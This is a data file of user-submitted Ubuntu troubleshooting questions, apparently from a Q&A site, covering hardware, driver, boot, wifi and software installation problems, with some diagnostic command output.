453243	no hdmi output sound ( full system specs provided )	i have recently installed ubuntu 13.10 on my samsung np355v5c ( relatively seamlessly ) . the only issue i am having , so far , is with the hdmi port sound not going to the tv . my graphics card is an amd radeon hd 7760g , main chipset is amd a70m . computer specs from samsung site . i have no indication of hdmi in the system sound settings . i have an ati r6xx hdmi tab in the gnome alsa mixer but no volume control in the realtek alc269vc tab where are my other controls are ( presumably that 's just my sound card controls ) i have also run pulseaudio volume control and though i have hdmi controls in there , still no response from my hdmi ports . and finally i have used pulse audio through the terminal and i know that the hdmi port is not muted . any suggestions as to how to solve this apparent hardware issue , or do i have to live with it for the time being ? thank you .
453245	edit grub2 to boot other partition	i was running out of space on my primary partition that i had originally set to 30gb ( i know , rookie mistake ) , but it was at the end of the disk so a resize operation would be more data loss prone than anything , so i copied my root partition to a much larger partition at the beginning of the disk with gparted , and that worked fine using a grub boot disk to boot it , though i do n't want to have to have a disk in my drive every time i turn my computer on , plus the simulated bios was making the wireless card unrecognizable . right now , i want to get my computer to boot into the other partition , as it 's not even showing up in the grub menu . i 'm really new to linux ( about half a year in actual experience ) and need almost all instructions to be simple and concise ( although a little explanation of why is fine ) . i want to add a boot entry to the grub menu on the mbr that boots to /dev/sda5 instead of /dev/sda2 if you need other numbers or some kind of terminal log or anything , please tell me , but make sure to tell me how . yes , i know , there is a great possibility that this is a `` duplicate '' , but none of the other ones made sense to me . edit : please help ! i know that other methods could have worked somewhat more effectively , but now i just want to get it working in the configuration it is in . i do n't want a speech about how i did it wrong , i just need directions , either that can scan all partitions for bootloaders and have them point to /dev/sda5 or so that i can change the names/mount names so that what is now dev/sda5 would be dev/sda2 so the bootloader the computer is using ( wherever it is ) is pointing to the partition i want to boot from .
453250	ubuntu start up view changed due to gnome shell	i recently installed ubuntu 14.04 lts trusty tahr on my laptop . its default desktop environment was unity . i installed gnome-desktop-environment then i could use both unity de and gnome de on my laptop . this made my bootup screen change to the ubuntu gnome logo , instead of the vanilla ubuntu logo . that 's ok , but after some time i thought i will only use unity , so i removed gnome-shell package and all of its configurations . now gnome-shell is removed but still i can see ubuntu gnome logo during boot . i ca n't see the cool ubuntu logo which i saw at previous when ubuntu 14.04 was freshly installed . is there any way to get back that look on starting up the system ? previous screen image : i want it back . my login screen is ok , login screen image :
453252	setup problems ubuntu 14.04 wifi on macbookpro 13.3 w/ retina ( dual boot )	i 'm new to ubuntu and linux in general and i 'm not sure how to go about setting up my wifi . it does n't detect any networks . i 'm using a late-2013 13.3 '' macbookpro with retina display , so it does n't come with an ethernet port . i used this installation guide to dual boot mac osx and ubuntu 14.04. https : //help.ubuntu.com/community/macbookpro11-1/saucy i have a second computer that runs windows 7 that i 'm using to research this and i want to avoid purchasing an ethernet adapter if possible . i also did not install/download any of the updates as a result . thank you so much in advance for your help !
453255	problem with mp3s converted in sound converter to gogear aria 8g losing artist & album tags	i have ubuntu 12.04.4 and a phillips gogear aria 8g . if i download an mp3 from amazon , noisetrade , or an artist 's website , i can just plug in my player via usb and drag the files over with no problem . i can then look up artists & albums on my player to find whichever song i want as usual . however , when i copy a file i extracted from a cd in rhythmbox and converted to mp3 with sound converter , the mp3s on my player are listed as unknown artist/unknown album . they also lose the album art . this makes it difficult to find the tracks i want to hear on my player . i should probably mention that the files appear correct on my laptop when i check them while the player is still connected . its when i disconnect it and try to find a song or album using the player only that this problem arises . any ideas on what i 'm doing wrong or how i can fix this ? thanks .
453256	can not see the lamp source	after installed apache2 , mysql , php , phpmyadmin on ubuntu 13.10 . i would like to see the installing folder and files , but i can not see them , it seems that ubuntu does not allow user to access the source files even i use sudo cd or sudo ls . i would like to learn that it is possible to see the files using sudo command . your help and information is great appreciated .
453257	juju local shared folder	i 'm using juju local and i want to create a shared folder between the host and one of the juju machines . how can i accomplish this ? i attempted these instructions with no success : https : //en.opensuse.org/user : tsu2/lxc_mount_shared_directory
453258	is running windows 7 in virtualbox on ubuntu comparable to windows 7 alone ?	i like ubuntu for its speed and security , but i play many windows-only games that do n't run very well ( or at all ) in wine . i do n't want to have a dual-boot setup either because it would be quite tiresome to constantly swap between ubuntu and windows 7 . so , does windows 7 running in virtualbox on ubuntu perform the same ( mainly graphics-wise ) or comparable to running windows 7 alone ? more specifically , would running a graphics-intense game like gta iv on windows 7 in virtualbox on ubuntu perform the same , or have the same framerate , as running gta iv on windows 7 alone ? also , is there any other way of emulating windows 7 in ubuntu that might work better ( excluding wine ) ? thanks !
453259	hibernation and suspension problems in lubuntu 14.04	i have problems when suspending and hibernating my computer when using lubuntu 14.04 . i click the shutdown icon in the lower right corner off the screen , and when i choose hibernate , i get an error : gdbus.error : org.freedesktop.dbus.error.accessdenied : operation not permitted , even when i am signed in as an administrator user . however , a graphical bug happens when i choose suspend . i click suspend , and my whole screen is `` divided '' depending on where my cursor is on my screen . when i move my cursor ( which is not visible ) , the area underneath my cursor is black ( again , the cursor is not visible but i know where it is ) , and the area above where my cursor is is just my ordinary desktop , except everything is flashing and moving from right to left , like how some really old tvs have a picture that moves and flickers from bottom to top or the other way around . i know describing what is happening is confusing , but stay with me . when i move my cursor to the top of the screen , my entire desktop looks normal again and is visible and normal , but my cursor is invisible . to the right of my cursor , there are a bunch of gray lines . it is really weird and the only way to stop it ( as far as i know right now ) is to restart the machine . what is up with my computer and what do i need to do to fix either problems ?
453265	ubuntu 14.04 wont recognize windows 8.1	when i boot ubuntu 14.04 off a usb/dvd to install it wont recognize windows 8.1 and only says `` erase disk and install ubuntu `` . this is the ubuntu that will work with my laptop . i do not want to get rid of windows 8 and the recovery partition because it will be like throwing $ 200 down the drain .
453266	skins for vlc media player do n't work in lubuntu 14.04	i have installed vlc media player in a fresh install of lubuntu 14.04 lts trusty tahr , meaning that my installation uses the new linux kernel 3.13 . i have installed vlc media player using synaptic , which uses the official ubuntu repositories . vlc media player works fine , until i attempt to use a skin . i go into vlc media player 's settings and choose the skin file like i am supposed to . i restart vlc media player , but something interesting happens . it shows in the taskbar as if it is opening , but the gui does n't load . then within one second , vlc media player disappears from the taskbar , as if it closed itself or crashed . sometimes when this happens , i get a window that says `` lubuntu 14.04 has experienced an internal error . '' then it asks me to send the bug report , which i usually do , but that does n't have anything to do with vlc media player . my question is : what is wrong ? is this a bug ? have i done something wrong ? ( i do n't think so though , because i had no problem using skins in lubuntu 13.10 saucy salamander . ) what can i do to fix this ?
453267	wireless wo n't connect in 14.04	i 'm still very new to ubuntu and i need help resolving an issue with my wireless . my connection shows up clearly as `` dlink '' but ubuntu simply wo n't connect to it . it worked fine downloading updates during the install . could you please help ? here is the output of lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 7 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter ( rev 01 ) and here 's ... lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 064e : e374 suyin corp . bus 001 device 003 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ouput of lsmod module size used by rfcomm 69160 0 bnep 19624 2 bluetooth 395423 10 bnep , rfcomm joydev 17381 0 snd_hda_codec_hdmi 46207 1 snd_hda_codec_realtek 61438 1 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core rts5139 335409 0 arc4 12608 2 intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 rtl8188ee 89601 0 kvm_intel 143060 0 rtl_pci 26690 1 rtl8188ee rtlwifi 63475 2 rtl_pci , rtl8188ee kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 mac80211 626489 3 rtl_pci , rtlwifi , rtl8188ee crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 cryptd 20359 1 ghash_clmulni_intel psmouse 102222 0 serio_raw 13462 0 lpc_ich 21080 0 cfg80211 484040 2 mac80211 , rtlwifi snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq snd 69238 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi i915 783485 3 drm_kms_helper 52758 1 i915 video 19476 1 i915 drm 302817 4 i915 , drm_kms_helper mac_hid 13205 0 soundcore 12680 1 snd mei_me 18627 0 i2c_algo_bit 13413 1 i915 mei 82274 1 mei_me parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc ahci 25819 2 libahci 32168 1 ahci alx 32452 0 mdio 13807 1 alx output of rfkill list all $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no output of nm-tool networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8188ee state : disconnected default : no hw address : 48 : d2:24 : cd:05:6b capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points att496 : infra , 20 : e5:64 : a1:5d : b0 , freq 2462 mhz , rate 54 mb/s , strength 27 wpa wpa2 att928 : infra , 38:6b : bb:0a:9c:70 , freq 2462 mhz , rate 54 mb/s , strength 27 wpa wpa2 att048 : infra , 58:56 : e8:8b:21 : f0 , freq 2462 mhz , rate 54 mb/s , strength 27 wpa wpa2 dlink : infra , 00:1c : f0 : c0:42:7f , freq 2462 mhz , rate 54 mb/s , strength 97 - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : alx state : connected default : yes hw address : 00:8c : fa:6d:59 : b8 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.103 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 please let me know if there 's anything else i can provide . thank you .
453268	mysql server admin error from workbench	i installed mysql workbench and would like to create a new server instance to admin the server , but i got following error message when i create a instance for local server . operation failed : file /etc/my.cnf does n't exist it looks like i need create a configuration file for new instance . can you please help me how to fix the issue ? your help and information is great appreciated , regards , inung
453270	uninstall copy.com from ubuntu 12.04	i have installed the cloud storage program , `` copy '' and want to uninstall it . how do i do that ?
453276	multiboot liveusb persistence with ubuntu , and kali linux	i used yumi from pendrive to install kali linux , and ubuntu 13 onto my 32gb flash drive . i then booted up to another usb with ubuntu and used gparted to create a seperate ext4 1gb partition on the drive and named it persistence . i then booted up with the original usb to kali linux and mounted , and created a config file for it following this tutorial : http : //www.youtube.com/watch ? v=_jev5ieuuvo then to boot into persistence mode , when presented with boot up options i selected livecd , and pressed tab , and typed persistence . this has all worked perfectly . so i started to do the same for linux , after doing it all , i realised there was nowhere to press tab : p stupid me ... so how can i get around to adding persistent with multiboot ? any help appreciated !
453277	can not install ubuntu on older workstation	this is my first time working with linux . i have an hp xw4400 workstation that i 'm trying to install ubuntu on . i have tried the 14.04 installation cd and a 12.04 minimal install disc neither of which seem to work . i want to focus on the 12.04 minimal cd install for this question . i run the cd and it comes up to the part where it is boot > i type in cli the disk drive spins and finally stops and the blank screen . what do i need to do to get this to work past this point .
453280	xubuntu 13.10 mouse/keyboard not responding	i am trying to get my 13.10 installation set up , but i can not seem to get the mouse or keyboard to work . kernel : generic kernel 3.11.0-14 motherboard : rog crosshair formula v processor : phenom ii x6 black edition ram : 32 gib potenza 1600 ddr3 ( 4x8 ) mouse / keyboard : logitech wave combo mk550 monitor : aoc hd 29 '' wide-wide ( hdmi connected ) / aoc hd 27 '' wide ( dvi connected ) so far i have tried : different usb hardware different ps/2 hardware http : //ubuntuforums.org/showthread.php ? t=1807149 usb mouse and keyboard not working in xubuntu liveusb two other links , but i ca n't post them because of the reputation requirements . also all of the links referenced inside . i have discovered : the keyboard works in grub . the keyboard does not work in recovery mode . iommu is enabled . usb 3.0 legacy support is enabled . usb legacy support is enabled . the mouse/keyboard works on the windows partition . the mouse/keyboard works on my laptop ( xubuntu 13.04 ) i am using single-user mode ( logs directly in ) and the mouse and keyboard do n't respond once the x window is loaded either . they clock works correctly , and the eth0 device responds to stimuli . if anybody has any insight into how this issue may be resolved , i would love to try just about anything you want to give me .
453284	ubuntu 14.04 with two ati graphics cards ( one fglrx , one radeon )	okay , so i have a motherboard with vga/dvi/hdmi and i use one of the ports off of it for one display and the mother display comes off my pcie hd 5830 . i want to keep the seperated because when i 'm in windows , i want all of the resources available from the card to this one monitor . now , i just installed 14.04 and then installed the drivers for the hd 5830 which fixed the glitches from the stock drivers however , doing so my igfx card is n't being enabled on boot anymore . any way to fix this ? i do n't expect it to use the same drivers at the pcie card but i do expect it to work . the onboard graphics card is ati hd4250 which is not supported by the proprietary catalyst drivers .
453287	how to launch lazarus ide after install ?	i used the following code to install lazarus ide : sudo apt-get install lazarus-ide however , the system ca n't seem to find a way to launch it from the dash . how i can run the lazarus ide after installation ?
453289	internet disconnects by itself and never reconnects unless system restarted	i am using ubuntu 13.10 and a wireless internet from a modem `` reliance netconnect '' for the internet . i 've installed ubuntu two days back along with my windows system . so here 's a detailed summary of what happens : i open my computer , the internet connects after i go to the top-right corner , select the signal logo and click on the `` reliance connection '' ( the only connection for internet on the pc ) . it connects immediately and says `` you 're registered on the home network . '' and the internet works fine . however , each time i 've opened my computer and connected , there 's this problem : it automatically disconnects after a while ( which is around 5-10 minutes i think ) . let me rephrase : it connects all fine and then disconnects by itself after a while of usage . now comes the main problem . no matter how many times i try to connect it through the same signal logo , it just wo n't connect ever . it only works when i open it again later and because now i know that rebooting does the trick ( well it merely refreshes everything ) , i reboot to reconnect to internet . now , as anyone would tell you , rebooting is not a viable alternative to reconnecting . what 's surprising is i googled it and not many people have this problem . on two separate threads , people first asked for full details about their modem and networks , drivers , etc . but were n't able to help at all . i am writing this long piece because i am using my windows at the moment . please help me . i do n't want to come back to windows . ubuntu is so awesome . everything else is so attractive and i 've set up fine . just this problem is forcing me to leave ubuntu - or any linux for that matter . please .
453290	trusty , lenovo y500 , and wifi	after a little googling , i was able to install ubuntu 14.04 on my lenovo y500 . grub would not install on /dev/sda ( 16gb ssd ) , but installed fine on the spinny disk . i 'm using the ssd as the swap device . but , wifi would not work . dhcp timeouts . any idea what might be causing this ? i have worked around the issue by setting a static address for wlan0 , but would really rather use dhcp if possible . for what it 's worth , wifi worked fine on this machine when running 13.10 .
453291	is it possible to use wine to run window games that is already installed on a external hard drive ( and to install future software on the external ) ?	i would like to know if it is possible to run windows games that are already installed on an external hard drive and have it load up though wine ? or do the games need to be installed by wine first before i can play them ? and also i like to know how to tell wine to install any future windows software that does work on wine to install them on a different drive than hard drive inside my computer ? and if the answer to the first question is the 2nd one . what will happen to the one already on the hard drive if i manage to get wine to install it there ?
453294	after i installed 14.04 desktop , launcher on left side is missing	after i installed the ubuntu 14.04 desktop , the unity launcher on left side is not appearing . i have confirmed that unity is installed .
453296	privacy issue when waking up suspended machine	using xfce , when i close the notebook lid it suspends , and when i open the lid it wakes up . when it wakes up it shows the screensaver until i press a key or move the mouse then it asks me for my password . all that is working beautifully . the issue is that when i open the lid , for a second or so i can see what is on the desktop , all the open windows , etc . then it does a fade into the screensaver . the expected behaviour is that i see a blank screen , or the login prompt , immediately . i 've removed the screen saver ( set it to be a black screen ) but that made no difference . is this something that can be configured ? system details : lenova e540 , mint 16 , xfce 4.10 . ( in contrast , my ubuntu 10.04 notebook did not have this issue : when the case was opened it always showed a blank screen . however i always had to suspend from the power control menu , as closing the case was unreliable as a way to get it to suspend , so maybe that was why ? ? ) more notes : ( thanks to nattgew for finding a related bug report . ) there appears to be a distinct difference between closing the screen , and going to the power manager and choosing suspend . close screen : screen visible when opening , then it goes to screensaver , then i have to type password to login . wifi net connection is preserved . explicit suspend : wifi is disconnected . when i resume the screen is visible , it does n't go to screensaver , it does n't ask password . it needs to reconnect to wifi . -- > fixed this bit . launch xfce4-session-settings , go to last tab ( `` advanced '' ) and mark `` lock screen before sleep '' checkbox . you also have to check the checbox that says the same thing in power manager preferences ! ! ( source . ) so , now i 've fixed this , both ways of suspending show the screen fading away into the screensaver , then prompt for password . however the explicit suspend is still the only one that disconnects wifi . ( using pm-suspend from the commandline works just like going to the power manager menu . )
453299	how to open a file as you type out its directory ?	i am new to using the terminal in ubuntu and i was wondering how i could open the file `` armored.jpg '' as i type out the whole path . for instance , if i type cd ~/pictures/wallpapers/test\ x/ and then type xdg-open armored.jpg in the current directory it opens the picture . however when i type : cd ~/pictures/wallpapers/test\ x/ xdg-open armored.jpg or cd ~/pictures/wallpapers/test\ x/armored.jpg or cd ~/pictures/wallpapers/test\ x/armored it does not work . can anyone explain why this is ? i want to know if i can open the file with something like this : cd ~/pictures/wallpapers/test\ x/**command goes here**/armored.jpg thanks
453303	eclipse for php and java packages	i installed eclipse for php and java projects . i tried to create a project and files and realized that there are no packages for developing php and java . is there any way to install those packages for the languages ?
453305	hp office jet 8600 scanner support	i am a newbie to ubuntu . i recently upgraded an older windows 7 computer to ubuntu 14.04 , and added a new hp officejet 8600 all-in-one printer . the printer works fine , but the scanner is not recognized . running hp-check states that i am missing packages for python-sdk , and others , required for `` scanner '' to work . can you help ? i can scan using another computer , and usb stick transfer , but would prefer direct scanning . thanks additional information : command sudo hp-check -r resulted in multiple pages of log initial display is probably the underlying cause : warning : ubuntu-14.04 version is not supported . using ubuntu-13.10 versions dependencies to verify and install ... the summary of errors indicates that there are some missing libraries : missing required dependencies error : 'libdbus-1-dev ' package is missing/incompatible error : 'libcups2 ' package is missing/incompatible error : 'openssl ' package is missing/incompatible error : 'python-dev ' package is missing/incompatible error : 'libcups2-dev ' package is missing/incompatible error : 'cups-bsd ' package is missing/incompatible error : 'cups-client ' package is missing/incompatible error : 'libsane-dev ' package is missing/incompatible error : 'libusb-1.0.0-dev ' package is missing/incompatible error : 'libcupsimage2-dev ' package is missing/incompatible error : 'libsnmp-dev ' package is missing/incompatible error : 'snmp-mibs-downloader ' package is missing/incompatible missing optional dependencies error : 'gtk2-engines-pixbuf ' package is missing/incompatible error : 'xsane ' package is missing/incompatible
453307	how do i increase the number of `` recently used applications '' in the dashboard ?	how can i increase the number of recently used applications that appear in the dashboard ? in ubuntu 12.04 ( or 14.04 ) , default installation , when you press the super key the dashboard opens , and the top most area says `` recently used applications '' ... it only shows 1 row containing 5 icons , but can i make it show more ? for example 2 rows or more ? ( yes you can click to expand it , but how can we increase the maximum number of rows ) ?
453309	ubuntu 14.04 lts & kubuntu 14.04 lts - unable to `` try '' either os	re : motherboard : emaxx mcp61d3-icafe ( 64/32 bit 64/32 bit capable ) cpu : amd sempron 145 ( 64/32 bit capable ) ram : 4gb ddr3 cd/dvd : samsung tsstcorp sh-s223c monitor : samsung sync master 633mw hdd : seagate 500gb i have tried to look at ( try it without installing ) ubuntu 14.04 lts ( 64bit ) and kubuntu 14.04 lts ( 64 bit ) . i can at least get to the point to decide try the os or install the os . every time i `` try '' the os i may , or may not , get the desktop . my computer will slow to slower than a `` snail 's pace '' ; almost on the verge of being locked up . for whatever the reason , it appears that my computer do not like this newest release . i currently have ubuntu 12.04.4 installed . looks like i am stuck with 12.04.4 . i have not tried to go to any versions after 12.04 and before 14.04 simply because they are not `` lts '' supported .
453312	make application / service priority really high	i am using two ubuntu computers , i use this synergy application to share mouse and keyboard . however when the synergy server computer is using peak cpu usage , the mouse pointer gets stiff . how do i make the synergy app high in priority that it will be prioritized to be process at all times .
453315	ca n't get ubuntu 14.04 i386 to install from dvd	i have tried burning 3 dvd 's following precise instructions from ubuntu download site but each time i try to install ubuntu the process just hangs after about 3 cycles of the ubuntu progress dots . i have 2 gb ram , pentium 4 and 86 gb free space on ssd c drive . i am new to ubuntu , i want to keep my xp running and thought it might be safe under the linux os
453323	how to get the sendto mail recipient in xubuntu 14.04 to use geary email client ?	i have geary set as my default email client on xubuntu 14.04 but when i try to use the send to mail recipient in thunar i get an error i am wanting to know how to make this possible without this error , and or why this error is occurring .
453325	how to check an os update is complete ?	yesterday i was trying update my os from 12.04 to 14.04 . this was done in my virtualbox . i left the terminal open and continuing downloading during the night . this morning when i came to my office , i saw the screen of my virtualbox ubuntu was deadlocked , i ca n't do any operation to it , it stays at some chromium interface i viewed last night . so i forced restart it , and then i found i was enter into the interface of 14.04 . after i logged in , several error box popped out . but after i installed virtualbox guestaddtion package . no more error box popped out when i enter the gui at the recently log-ins . but i was still worried about if there may be some lethal bugs left when updating , at least it was n't ended at an normal way . so , is there a way that i can check if my update was complete ?
453328	mouse does not work properly after suspension	after suspending my laptop , the touchpad and the usb mouse will not work properly . the cursor can move , but the buttons can not be clicked . but if i remove the corresponding modules and install them again , everything is fine . sudo rmmod psmouse sudo rmmod usbhid then sudo insmod / ... # install the psmouse module sudo insmod / ... # install usb mouse module it 's ok again . who can tell my how to make it right ? thanks !
453333	now that i 've upgraded from 13.10 to 14.04 my keyboard setting , us international with dead keys , does n't have dead keys . how do i get them back ?	the apostrophe key used to be the dead key . now when i press it all i get is apostrophe and no option for accents . how can i restore my dead keys ?
453335	attached to launch centre	i unattached eclipse from the launch centre and installed lazarus , which does not attach to the launch centre . i would like to learn if there any commands to attach my application to the launch centre .
453337	i get `` dpkg-query : no path found matching pattern '' how to solve this ?	i get `` dpkg-query : no path found matching pattern '' how to solve this ? i did the following things update the package index : sudo apt-get update install libdigest-md5-file-perl deb package : sudo apt-get install libdigest-md5-file-perl when i tried to install libdigest-md5-file-perl it said libdigest-md5-file-perl is already the newest version
453339	bluetooth support for yoga 11s in ubuntu 14.04	i recently installed 14.04 lts on my lenovo yoga 11s . i was wondering if there is/will be bluetooth support on this machine . as it stands , the bluetooth tab in the system settings shows the swtich , which can be toggled to show on , but no bluetooth activity is apparent . when you close the tab and reopen it , the switch is toggled back to off . thanks for any support
453340	exit terminal after scheduled command	i am trying to run unison to sync my files locally . i want that to occur periodically , without the need of any interaction . for that reason i run gnome-schedule with the following command : unison folder -silent -ui text everything works fine , just the terminal stays open and prompts for enter . i want to exit the terminal automatically after finishing the syncronization . how could i do this ? thanks and greetings
453347	brightness save on reboot	i have a problem where the brightness does not save after a reboot on 14.04 lts , but i had the same problem on 12.04 lts ( before i broke the system ) . before you say this is a duplicate of a million posts , i 've tried every single option that has been mentioned . i 've found that xbacklght does n't work no mater what i do with it . on my edited /etc/rc.local , however , i 've set it to execute , changed the permissions so it would run without sudo and even changed the permissions of the /sys/class/backlight/acpi_video0/brightness files ( and yes i 've tried the actual folder as well , not just the sym link ) . i got it to work a few times , but only for one boot until the permission changes reset themselves . thanks for the help in advance ! edit : i just remeber that i also have a folder called intel_brightness with it 's own set of values that could affect how acpi_video0 works . sorry for forgetting to add this earlier
453351	increasing swap memory in ubuntu 14.04	i want to know if it is possible to increase swap memory in ubuntu 14.04 . how is it possible ? another question : i installed ubuntu 14.04 on my laptop ( asus ) ... when i 'm working with it and open url pages and doing something else the speed start decreasing and speed quality is not satisfactory ... what is the problem ? note : my swap memory is 6g now and my ram memory is 4g ...
453357	xfce4 running in vesa mode after uprade to 14.04	while unity is running perfectly , xfce session is running in low graphics ( vesa ) mode . i think two things could be related : i 've got discrete graphics card and running nvidia-prime with the indicator provided here : http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu/pool/main/p/prime-indicator/ ( read somewhere that nvidia-prime package can break graphics , but i 've not clear while only in a de ) in 13.10 i modified xfce panel to use gtk3 indicators as mentioned here : https : //wiki.ubuntu.com/xubuntu/roadmap/specifications/saucy/gtk3indicators if logs could be of any help , please ask !
453359	fuji av-150 camera does n't work with ubuntu 14.04 as it did with 13.10	i am using ubuntu 14.04 lts ( 64 bit ) . i could access the 4gb memory of my fujifilm av-150 digital camera through nautilus in 13.10 , but it is no longer shown in 14.04 ! lsusb bus 002 device 003 : id 046d : c52f logitech , inc. unifying receiver bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 011 : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e230/e270/e870 hsdpa/hsupa modem bus 001 device 012 : id 04cb:021b fuji photo film co. , ltd bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lsblk prasad @ trusty-ubuntu : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda1 8:1 0 100m 0 part ├─sda2 8:2 0 99.9g 0 part ├─sda3 8:3 0 1k 0 part ├─sda4 8:4 0 30.2g 0 part ├─sda5 8:5 0 100g 0 part /mnt/linux ├─sda6 8:6 0 200g 0 part /mnt/media ├─sda7 8:7 0 300g 0 part └─sda8 8:8 0 201.3g 0 part /media/prasad/home sdb 8:16 0 465.8g 0 disk ├─sdb1 8:17 0 300m 0 part ├─sdb2 8:18 0 100m 0 part ├─sdb3 8:19 0 128m 0 part ├─sdb4 8:20 0 39.5g 0 part ├─sdb5 8:21 0 250g 0 part ├─sdb6 8:22 0 4g 0 part [ swap ] ├─sdb7 8:23 0 10g 0 part ├─sdb8 8:24 0 28g 0 part └─sdb9 8:25 0 28.6g 0 part / sr0 11:0 1 32.8m 0 rom dmesg the camera is detected but not mounted as a mass storage . in ubuntu 13.10 , it detects and mounts automatically without any hassle .
453360	w3m window in server	i am using proxy for internet with ubuntu server . in server we have to login the internet provider and it should be left idle . in gui we can minimize the browser . how to minimize w3m ?
453361	hud and menu integration for ubuntu touch apps	is there a way to move the tabs into a menu , or the toolbar options into a menu ? it would be nice enough to have the toolbar options display in the menu when on the desktop.. is there any work to add hud integration to qml apps ... if so where can i find the api ?
453362	ubuntu 14.04 + samsung series 7 slate + wacom palm rejection not working	please forgive me if this question has already been asked . is there a way to get palm rejection working in 14.04 on a samsung series 7 slate ? i am tired of holding my hand above the screen and would much prefer to let it rest on the screen . i suspect there might be some script change needed somewhere , but i have yet to find a post that addresses this setup using google . kind regards
453366	getting xbmc working on secondary display on ubuntu 14.04	there are a lot of questions and tips out there for getting xbmc working on a 2nd display for older versions of ubuntu , but the latest version ( 14.04 ) of ubuntu do n't seem to work with those tricks . i tried using wmctrl , but i get : wmctrl -l no protocol specified can not open display . can someone share a methodology that works well with ubuntu 14.04 ? i have an ivy bridge gpu if that maters . thanks !
453367	download failed : oracle jdk 7 is not installed	when i try to install something it gives me this error : http request sent , awaiting response ... 403 forbidden 2014-04-23 09:32:53 error 403 : forbidden . download failed oracle jdk 7 is not installed ... ... .. but i have oracle jdk 7 installed : mostafa @ mostafa-ep31-ds3l : ~ $ sudo update-alternatives -- config java 0 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java 1061 auto mode 1 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java 1061 manual mode * 2 /usr/lib/jvm/java-7-oracle/jre/bin/java 1 manual mode press enter to keep the current choice [ * ] , or type selection number : what is the problem and how can i resolve this ?
453368	skype : error while loading shared libraries : libxv.so.1 : can not open shared object file : no such file or directory	i am using ubuntu 14.04 and have tried the suggestions in the following post : skype : error while loading shared libraries : libxss.so.1 : can not open shared object file : no such file or directory and still get the same error
